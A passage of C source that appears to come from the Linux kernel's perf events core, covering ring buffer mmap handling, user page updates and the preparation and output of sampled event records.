/* Allow new userspace to detect that bit 0 is deprecated */
userpg->cap_bit0_is_deprecated = 1;
userpg->size = offsetof(struct perf_event_mmap_page, __reserved);
userpg->data_offset = PAGE_SIZE;
userpg->data_size = perf_data_size(rb);
unlock:
rcu_read_unlock();
}
void __weak arch_perf_update_userpage(
struct perf_event *event, struct perf_event_mmap_page *userpg, u64 now)
{
}
/*
* Callers need to ensure there can be no nesting of this function, otherwise
 * the seqlock logic goes bad. We cannot serialize this because the arch
* code calls this from NMI context.
*/
void perf_event_update_userpage(struct perf_event *event)
{
struct perf_event_mmap_page *userpg;
struct ring_buffer *rb;
u64 enabled, running, now;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
/*
* compute total_time_enabled, total_time_running
* based on snapshot values taken when the event
* was last scheduled in.
*
 * we cannot simply call update_context_time()
 * because of locking issues, as we can be called in
* NMI context
*/
calc_timer_values(event, &now, &enabled, &running);
userpg = rb->user_page;
/*
* Disable preemption so as to not let the corresponding user-space
* spin too long if we get preempted.
*/
preempt_disable();
++userpg->lock;
barrier();
userpg->index = perf_event_index(event);
userpg->offset = perf_event_count(event);
if (userpg->index)
userpg->offset -= local64_read(&event->hw.prev_count);
userpg->time_enabled = enabled +
atomic64_read(&event->child_total_time_enabled);
userpg->time_running = running +
atomic64_read(&event->child_total_time_running);
arch_perf_update_userpage(event, userpg, now);
barrier();
++userpg->lock;
preempt_enable();
unlock:
rcu_read_unlock();
}
static int perf_mmap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{
struct perf_event *event = vma->vm_file->private_data;
struct ring_buffer *rb;
int ret = VM_FAULT_SIGBUS;
if (vmf->flags & FAULT_FLAG_MKWRITE) {
if (vmf->pgoff == 0)
ret = 0;
return ret;
}
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (!rb)
goto unlock;
if (vmf->pgoff && (vmf->flags & FAULT_FLAG_WRITE))
goto unlock;
vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
if (!vmf->page)
goto unlock;
get_page(vmf->page);
vmf->page->mapping = vma->vm_file->f_mapping;
vmf->page->index = vmf->pgoff;
ret = 0;
unlock:
rcu_read_unlock();
return ret;
}
static void ring_buffer_attach(struct perf_event *event,
struct ring_buffer *rb)
{
struct ring_buffer *old_rb = NULL;
unsigned long flags;
if (event->rb) {
/*
* Should be impossible, we set this when removing
* event->rb_entry and wait/clear when adding event->rb_entry.
*/
WARN_ON_ONCE(event->rcu_pending);
old_rb = event->rb;
spin_lock_irqsave(&old_rb->event_lock, flags);
list_del_rcu(&event->rb_entry);
spin_unlock_irqrestore(&old_rb->event_lock, flags);
event->rcu_batches = get_state_synchronize_rcu();
event->rcu_pending = 1;
}
if (rb) {
if (event->rcu_pending) {
cond_synchronize_rcu(event->rcu_batches);
event->rcu_pending = 0;
}
spin_lock_irqsave(&rb->event_lock, flags);
list_add_rcu(&event->rb_entry, &rb->event_list);
spin_unlock_irqrestore(&rb->event_lock, flags);
}
/*
* Avoid racing with perf_mmap_close(AUX): stop the event
* before swizzling the event::rb pointer; if it's getting
* unmapped, its aux_mmap_count will be 0 and it won't
* restart. See the comment in __perf_pmu_output_stop().
*
* Data will inevitably be lost when set_output is done in
* mid-air, but then again, whoever does it like this is
* not in for the data anyway.
*/
if (has_aux(event))
perf_event_stop(event, 0);
rcu_assign_pointer(event->rb, rb);
if (old_rb) {
ring_buffer_put(old_rb);
/*
 * Since we detached the old rb before attaching the new one,
 * we could have missed a wakeup.
* Provide it now.
*/
wake_up_all(&event->waitq);
}
}
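/* Wake up every event attached to @event's ring buffer. */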
static void ring_buffer_wakeup(struct perf_event *event)
{
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (rb) {
list_for_each_entry_rcu(event, &rb->event_list, rb_entry)
wake_up_all(&event->waitq);
}
rcu_read_unlock();
}
struct ring_buffer *ring_buffer_get(struct perf_event *event)
{
struct ring_buffer *rb;
rcu_read_lock();
rb = rcu_dereference(event->rb);
if (rb) {
if (!atomic_inc_not_zero(&rb->refcount))
rb = NULL;
}
rcu_read_unlock();
return rb;
}
void ring_buffer_put(struct ring_buffer *rb)
{
if (!atomic_dec_and_test(&rb->refcount))
return;
WARN_ON_ONCE(!list_empty(&rb->event_list));
call_rcu(&rb->rcu_head, rb_free_rcu);
}
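/*
 * A new mapping of an existing buffer: bump the mmap counts so that
 * perf_mmap_close() knows when the last mapping goes away.
 */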
static void perf_mmap_open(struct vm_area_struct *vma)
{
struct perf_event *event = vma->vm_file->private_data;
atomic_inc(&event->mmap_count);
atomic_inc(&event->rb->mmap_count);
if (vma->vm_pgoff)
atomic_inc(&event->rb->aux_mmap_count);
if (event->pmu->event_mapped)
event->pmu->event_mapped(event);
}
static void perf_pmu_output_stop(struct perf_event *event);
/*
* A buffer can be mmap()ed multiple times; either directly through the same
* event, or through other events by use of perf_event_set_output().
*
* In order to undo the VM accounting done by perf_mmap() we need to destroy
* the buffer here, where we still have a VM context. This means we need
* to detach all events redirecting to us.
*/
static void perf_mmap_close(struct vm_area_struct *vma)
{
struct perf_event *event = vma->vm_file->private_data;
struct ring_buffer *rb = ring_buffer_get(event);
struct user_struct *mmap_user = rb->mmap_user;
int mmap_locked = rb->mmap_locked;
unsigned long size = perf_data_size(rb);
if (event->pmu->event_unmapped)
event->pmu->event_unmapped(event);
/*
* rb->aux_mmap_count will always drop before rb->mmap_count and
* event->mmap_count, so it is ok to use event->mmap_mutex to
* serialize with perf_mmap here.
*/
if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
/*
* Stop all AUX events that are writing to this buffer,
* so that we can free its AUX pages and corresponding PMU
* data. Note that after rb::aux_mmap_count dropped to zero,
* they won't start any more (see perf_aux_output_begin()).
*/
perf_pmu_output_stop(event);
/* now it's safe to free the pages */
atomic_long_sub(rb->aux_nr_pages, &mmap_user->locked_vm);
vma->vm_mm->pinned_vm -= rb->aux_mmap_locked;
/* this has to be the last one */
rb_free_aux(rb);
WARN_ON_ONCE(atomic_read(&rb->aux_refcount));
mutex_unlock(&event->mmap_mutex);
}
atomic_dec(&rb->mmap_count);
if (!atomic_dec_and_mutex_lock(&event->mmap_count, &event->mmap_mutex))
goto out_put;
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
/* If there's still other mmap()s of this buffer, we're done. */
if (atomic_read(&rb->mmap_count))
goto out_put;
/*
* No other mmap()s, detach from all other events that might redirect
* into the now unreachable buffer. Somewhat complicated by the
* fact that rb::event_lock otherwise nests inside mmap_mutex.
*/
again:
rcu_read_lock();
list_for_each_entry_rcu(event, &rb->event_list, rb_entry) {
if (!atomic_long_inc_not_zero(&event->refcount)) {
/*
* This event is en-route to free_event() which will
* detach it and remove it from the list.
*/
continue;
}
rcu_read_unlock();
mutex_lock(&event->mmap_mutex);
/*
* Check we didn't race with perf_event_set_output() which can
* swizzle the rb from under us while we were waiting to
* acquire mmap_mutex.
*
 * If we find a different rb, ignore this event; a next
* iteration will no longer find it on the list. We have to
* still restart the iteration to make sure we're not now
* iterating the wrong list.
*/
if (event->rb == rb)
ring_buffer_attach(event, NULL);
mutex_unlock(&event->mmap_mutex);
put_event(event);
/*
* Restart the iteration; either we're on the wrong list or
 * we destroyed its integrity by doing a deletion.
*/
goto again;
}
rcu_read_unlock();
/*
* It could be there's still a few 0-ref events on the list; they'll
* get cleaned up by free_event() -- they'll also still have their
* ref on the rb and will free it whenever they are done with it.
*
* Aside from that, this buffer is 'fully' detached and unmapped,
* undo the VM accounting.
*/
atomic_long_sub((size >> PAGE_SHIFT) + 1, &mmap_user->locked_vm);
vma->vm_mm->pinned_vm -= mmap_locked;
free_uid(mmap_user);
out_put:
ring_buffer_put(rb); /* could be last */
}
static const struct vm_operations_struct perf_mmap_vmops = {
.open = perf_mmap_open,
	.close		= perf_mmap_close, /* non mergeable */
.fault = perf_mmap_fault,
.page_mkwrite = perf_mmap_fault,
};
static int perf_mmap(struct file *file, struct vm_area_struct *vma)
{
struct perf_event *event = file->private_data;
unsigned long user_locked, user_lock_limit;
struct user_struct *user = current_user();
unsigned long locked, lock_limit;
struct ring_buffer *rb = NULL;
unsigned long vma_size;
unsigned long nr_pages;
long user_extra = 0, extra = 0;
int ret = 0, flags = 0;
/*
* Don't allow mmap() of inherited per-task counters. This would
* create a performance issue due to all children writing to the
* same rb.
*/
if (event->cpu == -1 && event->attr.inherit)
return -EINVAL;
if (!(vma->vm_flags & VM_SHARED))
return -EINVAL;
vma_size = vma->vm_end - vma->vm_start;
if (vma->vm_pgoff == 0) {
nr_pages = (vma_size / PAGE_SIZE) - 1;
} else {
/*
* AUX area mapping: if rb->aux_nr_pages != 0, it's already
 * mapped; all subsequent mappings should have the same size
* and offset. Must be above the normal perf buffer.
*/
u64 aux_offset, aux_size;
if (!event->rb)
return -EINVAL;
nr_pages = vma_size / PAGE_SIZE;
mutex_lock(&event->mmap_mutex);
ret = -EINVAL;
rb = event->rb;
if (!rb)
goto aux_unlock;
aux_offset = ACCESS_ONCE(rb->user_page->aux_offset);
aux_size = ACCESS_ONCE(rb->user_page->aux_size);
if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
goto aux_unlock;
if (aux_offset != vma->vm_pgoff << PAGE_SHIFT)
goto aux_unlock;
/* already mapped with a different offset */
if (rb_has_aux(rb) && rb->aux_pgoff != vma->vm_pgoff)
goto aux_unlock;
if (aux_size != vma_size || aux_size != nr_pages * PAGE_SIZE)
goto aux_unlock;
/* already mapped with a different size */
if (rb_has_aux(rb) && rb->aux_nr_pages != nr_pages)
goto aux_unlock;
if (!is_power_of_2(nr_pages))
goto aux_unlock;
if (!atomic_inc_not_zero(&rb->mmap_count))
goto aux_unlock;
if (rb_has_aux(rb)) {
atomic_inc(&rb->aux_mmap_count);
ret = 0;
goto unlock;
}
atomic_set(&rb->aux_mmap_count, 1);
user_extra = nr_pages;
goto accounting;
}
/*
* If we have rb pages ensure they're a power-of-two number, so we
* can do bitmasks instead of modulo.
*/
if (nr_pages != 0 && !is_power_of_2(nr_pages))
return -EINVAL;
if (vma_size != PAGE_SIZE * (1 + nr_pages))
return -EINVAL;
WARN_ON_ONCE(event->ctx->parent_ctx);
again:
mutex_lock(&event->mmap_mutex);
if (event->rb) {
if (event->rb->nr_pages != nr_pages) {
ret = -EINVAL;
goto unlock;
}
if (!atomic_inc_not_zero(&event->rb->mmap_count)) {
/*
* Raced against perf_mmap_close() through
* perf_event_set_output(). Try again, hope for better
* luck.
*/
mutex_unlock(&event->mmap_mutex);
goto again;
}
goto unlock;
}
user_extra = nr_pages + 1;
accounting:
user_lock_limit = sysctl_perf_event_mlock >> (PAGE_SHIFT - 10);
/*
* Increase the limit linearly with more CPUs:
*/
user_lock_limit *= num_online_cpus();
user_locked = atomic_long_read(&user->locked_vm) + user_extra;
if (user_locked > user_lock_limit)
extra = user_locked - user_lock_limit;
lock_limit = rlimit(RLIMIT_MEMLOCK);
lock_limit >>= PAGE_SHIFT;
locked = vma->vm_mm->pinned_vm + extra;
if ((locked > lock_limit) && perf_paranoid_tracepoint_raw() &&
!capable(CAP_IPC_LOCK)) {
ret = -EPERM;
goto unlock;
}
WARN_ON(!rb && event->rb);
if (vma->vm_flags & VM_WRITE)
flags |= RING_BUFFER_WRITABLE;
if (!rb) {
rb = rb_alloc(nr_pages,
event->attr.watermark ? event->attr.wakeup_watermark : 0,
event->cpu, flags);
if (!rb) {
ret = -ENOMEM;
goto unlock;
}
atomic_set(&rb->mmap_count, 1);
rb->mmap_user = get_current_user();
rb->mmap_locked = extra;
ring_buffer_attach(event, rb);
perf_event_init_userpage(event);
perf_event_update_userpage(event);
} else {
ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
event->attr.aux_watermark, flags);
if (!ret)
rb->aux_mmap_locked = extra;
}
unlock:
if (!ret) {
atomic_long_add(user_extra, &user->locked_vm);
vma->vm_mm->pinned_vm += extra;
atomic_inc(&event->mmap_count);
} else if (rb) {
atomic_dec(&rb->mmap_count);
}
aux_unlock:
mutex_unlock(&event->mmap_mutex);
/*
* Since pinned accounting is per vm we cannot allow fork() to copy our
* vma.
*/
vma->vm_flags |= VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP;
vma->vm_ops = &perf_mmap_vmops;
if (event->pmu->event_mapped)
event->pmu->event_mapped(event);
return ret;
}
static int perf_fasync(int fd, struct file *filp, int on)
{
struct inode *inode = file_inode(filp);
struct perf_event *event = filp->private_data;
int retval;
inode_lock(inode);
retval = fasync_helper(fd, filp, on, &event->fasync);
inode_unlock(inode);
if (retval < 0)
return retval;
return 0;
}
static const struct file_operations perf_fops = {
.llseek = no_llseek,
.release = perf_release,
.read = perf_read,
.poll = perf_poll,
.unlocked_ioctl = perf_ioctl,
.compat_ioctl = perf_compat_ioctl,
.mmap = perf_mmap,
.fasync = perf_fasync,
};
/*
* Perf event wakeup
*
* If there's data, ensure we set the poll() state and publish everything
* to user-space before waking everybody up.
*/
static inline struct fasync_struct **perf_event_fasync(struct perf_event *event)
{
/* only the parent has fasync state */
if (event->parent)
event = event->parent;
return &event->fasync;
}
void perf_event_wakeup(struct perf_event *event)
{
ring_buffer_wakeup(event);
if (event->pending_kill) {
kill_fasync(perf_event_fasync(event), SIGIO, event->pending_kill);
event->pending_kill = 0;
}
}
static void perf_pending_event(struct irq_work *entry)
{
struct perf_event *event = container_of(entry,
struct perf_event, pending);
int rctx;
rctx = perf_swevent_get_recursion_context();
/*
* If we 'fail' here, that's OK, it means recursion is already disabled
* and we won't recurse 'further'.
*/
if (event->pending_disable) {
event->pending_disable = 0;
perf_event_disable_local(event);
}
if (event->pending_wakeup) {
event->pending_wakeup = 0;
perf_event_wakeup(event);
}
if (rctx >= 0)
perf_swevent_put_recursion_context(rctx);
}
/*
* We assume there is only KVM supporting the callbacks.
* Later on, we might change it to a list if there is
* another virtualization implementation supporting the callbacks.
*/
struct perf_guest_info_callbacks *perf_guest_cbs;
int perf_register_guest_info_callbacks(struct perf_guest_info_callbacks *cbs)
{
perf_guest_cbs = cbs;
return 0;
}
EXPORT_SYMBOL_GPL(perf_register_guest_info_callbacks);
int perf_unregister_guest_info_callbacks(struct perf_guest_info_callbacks *cbs)
{
perf_guest_cbs = NULL;
return 0;
}
EXPORT_SYMBOL_GPL(perf_unregister_guest_info_callbacks);
static void
perf_output_sample_regs(struct perf_output_handle *handle,
struct pt_regs *regs, u64 mask)
{
int bit;
DECLARE_BITMAP(_mask, 64);
bitmap_from_u64(_mask, mask);
for_each_set_bit(bit, _mask, sizeof(mask) * BITS_PER_BYTE) {
u64 val;
val = perf_reg_value(regs, bit);
perf_output_put(handle, val);
}
}
static void perf_sample_regs_user(struct perf_regs *regs_user,
struct pt_regs *regs,
struct pt_regs *regs_user_copy)
{
if (user_mode(regs)) {
regs_user->abi = perf_reg_abi(current);
regs_user->regs = regs;
} else if (current->mm) {
perf_get_regs_user(regs_user, regs, regs_user_copy);
} else {
regs_user->abi = PERF_SAMPLE_REGS_ABI_NONE;
regs_user->regs = NULL;
}
}
static void perf_sample_regs_intr(struct perf_regs *regs_intr,
struct pt_regs *regs)
{
regs_intr->regs = regs;
regs_intr->abi = perf_reg_abi(current);
}
/*
* Get remaining task size from user stack pointer.
*
 * It'd be better to take the stack vma map and limit this more
 * precisely, but there's no way to get it safely under interrupt,
 * so we use TASK_SIZE as the limit.
*/
static u64 perf_ustack_task_size(struct pt_regs *regs)
{
unsigned long addr = perf_user_stack_pointer(regs);
if (!addr || addr >= TASK_SIZE)
return 0;
return TASK_SIZE - addr;
}
static u16
perf_sample_ustack_size(u16 stack_size, u16 header_size,
struct pt_regs *regs)
{
u64 task_size;
/* No regs, no stack pointer, no dump. */
if (!regs)
return 0;
/*
 * Check that the requested stack size fits into:
 * - TASK_SIZE
 *   If it doesn't, we limit the size to TASK_SIZE.
 *
 * - the remaining sample size
 *   If it doesn't, we shrink the stack size to fit
 *   the remaining sample size.
*/
task_size = min((u64) USHRT_MAX, perf_ustack_task_size(regs));
stack_size = min(stack_size, (u16) task_size);
/* Current header size plus static size and dynamic size. */
header_size += 2 * sizeof(u64);
/* Do we fit in with the current stack dump size? */
if ((u16) (header_size + stack_size) < header_size) {
/*
* If we overflow the maximum size for the sample,
* we customize the stack dump size to fit in.
*/
stack_size = USHRT_MAX - header_size - sizeof(u64);
stack_size = round_up(stack_size, sizeof(u64));
}
return stack_size;
}
static void
perf_output_sample_ustack(struct perf_output_handle *handle, u64 dump_size,
struct pt_regs *regs)
{
/* Case of a kernel thread, nothing to dump */
if (!regs) {
u64 size = 0;
perf_output_put(handle, size);
} else {
unsigned long sp;
unsigned int rem;
u64 dyn_size;
/*
* We dump:
* static size
* - the size requested by user or the best one we can fit
* in to the sample max size
* data
* - user stack dump data
* dynamic size
* - the actual dumped size
*/
/* Static size. */
perf_output_put(handle, dump_size);
/* Data. */
sp = perf_user_stack_pointer(regs);
rem = __output_copy_user(handle, (void *) sp, dump_size);
dyn_size = dump_size - rem;
perf_output_skip(handle, rem);
/* Dynamic size. */
perf_output_put(handle, dyn_size);
}
}
static void __perf_event_header__init_id(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
u64 sample_type = event->attr.sample_type;
data->type = sample_type;
header->size += event->id_header_size;
if (sample_type & PERF_SAMPLE_TID) {
/* namespace issues */
data->tid_entry.pid = perf_event_pid(event, current);
data->tid_entry.tid = perf_event_tid(event, current);
}
if (sample_type & PERF_SAMPLE_TIME)
data->time = perf_event_clock(event);
if (sample_type & (PERF_SAMPLE_ID | PERF_SAMPLE_IDENTIFIER))
data->id = primary_event_id(event);
if (sample_type & PERF_SAMPLE_STREAM_ID)
data->stream_id = event->id;
if (sample_type & PERF_SAMPLE_CPU) {
data->cpu_entry.cpu = raw_smp_processor_id();
data->cpu_entry.reserved = 0;
}
}
void perf_event_header__init_id(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
if (event->attr.sample_id_all)
__perf_event_header__init_id(header, data, event);
}
static void __perf_event__output_id_sample(struct perf_output_handle *handle,
struct perf_sample_data *data)
{
u64 sample_type = data->type;
if (sample_type & PERF_SAMPLE_TID)
perf_output_put(handle, data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
perf_output_put(handle, data->time);
if (sample_type & PERF_SAMPLE_ID)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
perf_output_put(handle, data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
perf_output_put(handle, data->cpu_entry);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
perf_output_put(handle, data->id);
}
void perf_event__output_id_sample(struct perf_event *event,
struct perf_output_handle *handle,
struct perf_sample_data *sample)
{
if (event->attr.sample_id_all)
__perf_event__output_id_sample(handle, sample);
}
static void perf_output_read_one(struct perf_output_handle *handle,
struct perf_event *event,
u64 enabled, u64 running)
{
u64 read_format = event->attr.read_format;
u64 values[4];
int n = 0;
values[n++] = perf_event_count(event);
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED) {
values[n++] = enabled +
atomic64_read(&event->child_total_time_enabled);
}
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING) {
values[n++] = running +
atomic64_read(&event->child_total_time_running);
}
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(event);
__output_copy(handle, values, n * sizeof(u64));
}
/*
* XXX PERF_FORMAT_GROUP vs inherited events seems difficult.
*/
static void perf_output_read_group(struct perf_output_handle *handle,
struct perf_event *event,
u64 enabled, u64 running)
{
struct perf_event *leader = event->group_leader, *sub;
u64 read_format = event->attr.read_format;
u64 values[5];
int n = 0;
values[n++] = 1 + leader->nr_siblings;
if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
values[n++] = enabled;
if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
values[n++] = running;
if (leader != event)
leader->pmu->read(leader);
values[n++] = perf_event_count(leader);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(leader);
__output_copy(handle, values, n * sizeof(u64));
list_for_each_entry(sub, &leader->sibling_list, group_entry) {
n = 0;
if ((sub != event) &&
(sub->state == PERF_EVENT_STATE_ACTIVE))
sub->pmu->read(sub);
values[n++] = perf_event_count(sub);
if (read_format & PERF_FORMAT_ID)
values[n++] = primary_event_id(sub);
__output_copy(handle, values, n * sizeof(u64));
}
}
#define PERF_FORMAT_TOTAL_TIMES (PERF_FORMAT_TOTAL_TIME_ENABLED|\
PERF_FORMAT_TOTAL_TIME_RUNNING)
static void perf_output_read(struct perf_output_handle *handle,
struct perf_event *event)
{
u64 enabled = 0, running = 0, now;
u64 read_format = event->attr.read_format;
/*
* compute total_time_enabled, total_time_running
* based on snapshot values taken when the event
* was last scheduled in.
*
 * we cannot simply call update_context_time()
 * because of locking issues, as we are called in
* NMI context
*/
if (read_format & PERF_FORMAT_TOTAL_TIMES)
calc_timer_values(event, &now, &enabled, &running);
if (event->attr.read_format & PERF_FORMAT_GROUP)
perf_output_read_group(handle, event, enabled, running);
else
perf_output_read_one(handle, event, enabled, running);
}
void perf_output_sample(struct perf_output_handle *handle,
struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event)
{
u64 sample_type = data->type;
perf_output_put(handle, *header);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_IP)
perf_output_put(handle, data->ip);
if (sample_type & PERF_SAMPLE_TID)
perf_output_put(handle, data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
perf_output_put(handle, data->time);
if (sample_type & PERF_SAMPLE_ADDR)
perf_output_put(handle, data->addr);
if (sample_type & PERF_SAMPLE_ID)
perf_output_put(handle, data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
perf_output_put(handle, data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
perf_output_put(handle, data->cpu_entry);
if (sample_type & PERF_SAMPLE_PERIOD)
perf_output_put(handle, data->period);
if (sample_type & PERF_SAMPLE_READ)
perf_output_read(handle, event);
if (sample_type & PERF_SAMPLE_CALLCHAIN) {
if (data->callchain) {
int size = 1;
if (data->callchain)
size += data->callchain->nr;
size *= sizeof(u64);
__output_copy(handle, data->callchain, size);
} else {
u64 nr = 0;
perf_output_put(handle, nr);
}
}
if (sample_type & PERF_SAMPLE_RAW) {
struct perf_raw_record *raw = data->raw;
if (raw) {
struct perf_raw_frag *frag = &raw->frag;
perf_output_put(handle, raw->size);
do {
if (frag->copy) {
__output_custom(handle, frag->copy,
frag->data, frag->size);
} else {
__output_copy(handle, frag->data,
frag->size);
}
if (perf_raw_frag_last(frag))
break;
frag = frag->next;
} while (1);
if (frag->pad)
__output_skip(handle, NULL, frag->pad);
} else {
struct {
u32 size;
u32 data;
} raw = {
.size = sizeof(u32),
.data = 0,
};
perf_output_put(handle, raw);
}
}
if (sample_type & PERF_SAMPLE_BRANCH_STACK) {
if (data->br_stack) {
size_t size;
size = data->br_stack->nr
* sizeof(struct perf_branch_entry);
perf_output_put(handle, data->br_stack->nr);
perf_output_copy(handle, data->br_stack->entries, size);
} else {
/*
* we always store at least the value of nr
*/
u64 nr = 0;
perf_output_put(handle, nr);
}
}
if (sample_type & PERF_SAMPLE_REGS_USER) {
u64 abi = data->regs_user.abi;
/*
* If there are no regs to dump, notice it through
 * the first u64 being zero (PERF_SAMPLE_REGS_ABI_NONE).
*/
perf_output_put(handle, abi);
if (abi) {
u64 mask = event->attr.sample_regs_user;
perf_output_sample_regs(handle,
data->regs_user.regs,
mask);
}
}
if (sample_type & PERF_SAMPLE_STACK_USER) {
perf_output_sample_ustack(handle,
data->stack_user_size,
data->regs_user.regs);
}
if (sample_type & PERF_SAMPLE_WEIGHT)
perf_output_put(handle, data->weight);
if (sample_type & PERF_SAMPLE_DATA_SRC)
perf_output_put(handle, data->data_src.val);
if (sample_type & PERF_SAMPLE_TRANSACTION)
perf_output_put(handle, data->txn);
if (sample_type & PERF_SAMPLE_REGS_INTR) {
u64 abi = data->regs_intr.abi;
/*
* If there are no regs to dump, notice it through
 * the first u64 being zero (PERF_SAMPLE_REGS_ABI_NONE).
*/
perf_output_put(handle, abi);
if (abi) {
u64 mask = event->attr.sample_regs_intr;
perf_output_sample_regs(handle,
data->regs_intr.regs,
mask);
}
}
if (!event->attr.watermark) {
int wakeup_events = event->attr.wakeup_events;
if (wakeup_events) {
struct ring_buffer *rb = handle->rb;
int events = local_inc_return(&rb->events);
if (events >= wakeup_events) {
local_sub(wakeup_events, &rb->events);
local_inc(&rb->wakeup);
}
}
}
}
void perf_prepare_sample(struct perf_event_header *header,
struct perf_sample_data *data,
struct perf_event *event,
struct pt_regs *regs)
{
u64 sample_type = event->attr.sample_type;
header->type = PERF_RECORD_SAMPLE;
header->size = sizeof(*header) + event->header_size;
header->misc = 0;
header->misc |= perf_misc_flags(regs);
__perf_event_header__init_id(header, data, event);
if (sample_type & PERF_SAMPLE_IP)
data->ip = perf_instruction_pointer(regs);
if (sample_type & PERF_SAMPLE_CALLCHAIN) {
int size = 1;
data->callchain = perf_callchain(event, regs);
if (data->callchain)
size += data->callchain->nr;
header->size += size * sizeof(u64);
}
if (sample_type & PERF_SAMPLE_RAW) {
struct perf_raw_record *raw = data->raw;
int size;
if (raw) {
struct perf_raw_frag *frag = &raw->frag;
u32 sum = 0;
do {
sum += frag->size;
if (perf_raw_frag_last(frag))
break;
frag = frag->next;
} while (1);
size = round_up(sum + sizeof(u32), sizeof(u64));
raw->size = size - sizeof(u32);
frag->pad = raw->size - sum;
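/*
 * Illustrative sizing example (made-up numbers): if the fragments
 * sum to 10 bytes, size = round_up(10 + 4, 8) = 16, so raw->size
 * becomes 12 and frag->pad is 2 trailing padding bytes.
 */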
} else {
size = sizeof(u64);
}
header->size += size;
}
if (sample_type & PERF_SAMPLE_BRANCH_STACK) {
int size = sizeof(u64); /* nr */
if (data->br_stack) {
size += data->br_stack->nr
* sizeof(struct perf_branch_entry);
}
header->size += size;
}
if (sample_type & (PERF_SAMPLE_REGS_USER | PERF_SAMPLE_STACK_USER))
perf_sample_regs_user(&data->regs_user, regs,
&data->regs_user_copy);
if (sample_type & PERF_SAMPLE_REGS_USER) {
/* regs dump ABI info */
int size = sizeof(u64);
if (data->regs_user.regs) {
u64 mask = event->attr.sample_regs_user;
size += hweight64(mask) * sizeof(u64);
}
header->size += size;
}
if (sample_type & PERF_SAMPLE_STACK_USER) {
/*
* Either the PERF_SAMPLE_STACK_USER bit needs to always be
* processed as the last one, or an additional check must be
* added whenever a new sample type is introduced, because we could eat
* up the rest of the sample size.
*/
u16 stack_size = event->attr.sample_stack_user;
u16 size = sizeof(u64);
stack_size = perf_sample_ustack_size(stack_size, header->size,
data->regs_user.regs);
/*
* If there is something to dump, add space for the dump
* itself and for the field that tells the dynamic size,
* which is how many have been actually dumped.
*/
if (stack_size)
size += sizeof(u64) + stack_size;
data->stack_user_size = stack_size;
header->size += size;
}
if (sample_type & PERF_SAMPLE_REGS_INTR) {
/* regs dump ABI info */
int size = sizeof(u64);
perf_sample_regs_intr(&data->regs_intr, regs);
if (data->regs_intr.regs) {
u64 mask = event->attr.sample_regs_intr;
size += hweight64(mask) * sizeof(u64);
}
header->size += size;
}
}
static void __always_inline
__perf_event_output(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs,
int (*output_begin)(struct perf_output_handle *,
struct perf_event *,
unsigned int))
{
struct perf_output_handle handle;
struct perf_event_header header;
/* protect the callchain buffers */
rcu_read_lock();
perf_prepare_sample(&header, data, event, regs);
if (output_begin(&handle, event, header.size))
goto exit;
perf_output_sample(&handle, &header, data, event);
perf_output_end(&handle);
exit:
rcu_read_unlock();
}
void
perf_event_output_forward(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin_forward);
}
void
perf_event_output_backward(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin_backward);
}
void
perf_event_output(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin);
}
/*
* read event_id
*/
struct perf_read_event {
struct perf_event_header header;
u32 pid;
u32 tid;
};
static void
perf_event_read_event(struct perf_event *event,
struct task_struct *task)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_read_event read_event = {
.header = {
.type = PERF_RECORD_READ,
.misc = 0,
.size = sizeof(read_event) + event->read_size,
},
.pid = perf_event_pid(event, task),
.tid = perf_event_tid(event, task),
};
int ret;
perf_event_header__init_id(&read_event.header, &sample, event);
ret = perf_output_begin(&handle, event, read_event.header.size);
if (ret)
return;
perf_output_put(&handle, read_event);
perf_output_read(&handle, event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
typedef void (perf_iterate_f)(struct perf_event *event, void *data);
static void
perf_iterate_ctx(struct perf_event_context *ctx,
perf_iterate_f output,
void *data, bool all)
{
struct perf_event *event;
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (!all) {
if (event->state < PERF_EVENT_STATE_INACTIVE)
continue;
if (!event_filter_match(event))
continue;
}
output(event, data);
}
}
static void perf_iterate_sb_cpu(perf_iterate_f output, void *data)
{
struct pmu_event_list *pel = this_cpu_ptr(&pmu_sb_events);
struct perf_event *event;
list_for_each_entry_rcu(event, &pel->list, sb_list) {
/*
* Skip events that are not fully formed yet; ensure that
* if we observe event->ctx, both event and ctx will be
* complete enough. See perf_install_in_context().
*/
if (!smp_load_acquire(&event->ctx))
continue;
